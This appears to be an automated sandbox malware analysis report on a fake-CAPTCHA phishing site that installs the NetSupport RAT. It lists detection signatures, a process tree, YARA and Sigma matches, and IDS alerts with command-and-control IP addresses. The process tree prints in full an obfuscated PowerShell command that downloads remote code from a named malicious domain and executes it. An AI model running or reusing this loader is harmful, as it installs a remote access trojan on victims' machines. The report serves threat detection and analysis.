Windows Analysis Report
https://webdemo.biz/
Overview
Detection
NetSupport RAT, CAPTCHA Scam
Field | Value |
---|---|
Score | 100 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
AI detected phishing page
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam
Downloads files with wrong headers with respect to MIME Content-Type
Powershell drops PE file
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ipconfig to lookup or modify the Windows network settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Classification
- System is w10x64_ra
- chrome.exe (PID: 5700 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 7020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1936,i,13169113144443603828,12295898762207964987,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 6680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://webdemo.biz/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- svchost.exe (PID: 2848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- mshta.exe (PID: 7940 cmdline: "C:\Windows\system32\mshta.exe" https://webdemo.biz/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 2537'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- powershell.exe (PID: 8036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- ipconfig.exe (PID: 1284 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
- cmd.exe (PID: 3428 cmdline: "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\HzYATQ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- attrib.exe (PID: 5940 cmdline: attrib +h C:\Users\user\AppData\Roaming\HzYATQ MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
- client32.exe (PID: 7688 cmdline: "C:\Users\user\AppData\Roaming\HzYATQ\client32.exe" MD5: EE75B57B9300AAB96530503BFAE8A2F2)
- cleanup
Rule | Description | Author | Strings |
---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
(19 entries were collapsed in the original report; the Source column was not preserved in this export.)
Rule | Description | Author | Strings |
---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | |
(3 entries were collapsed in the original report; the Source column was not preserved in this export.)
Rule | Description | Author | Strings |
---|---|---|---|
JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam | Joe Security | |
System Summary (Sigma rule matches; rule titles and sources were not preserved in this export, only the rule authors):
- Michael Haag
- Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
- frack113, Nasreddine Bencherchali (Nextron Systems)
- Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
- vburov
Remote Access Functionality (rule author: Joe Security)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-31T00:15:42.254947+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:43.896654+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:45.856988+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.019053+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.243368+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.411456+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.663800+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.866278+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:52.195934+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:53.167434+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49739 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:55.980864+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49740 | 166.1.160.211 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-31T00:15:03.265705+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49742 | 92.255.85.135 | 443 | TCP |
Phishing (evidence types; the per-item details were not preserved in this export):
- LLM
- File source
- HTTP Parser (3 items)
- File opened
- HTTPS traffic detected (13 items)
- Memory has grown
Networking (evidence types; the per-item details were not preserved in this export):
- Suricata IDS
- Image file has PE prefix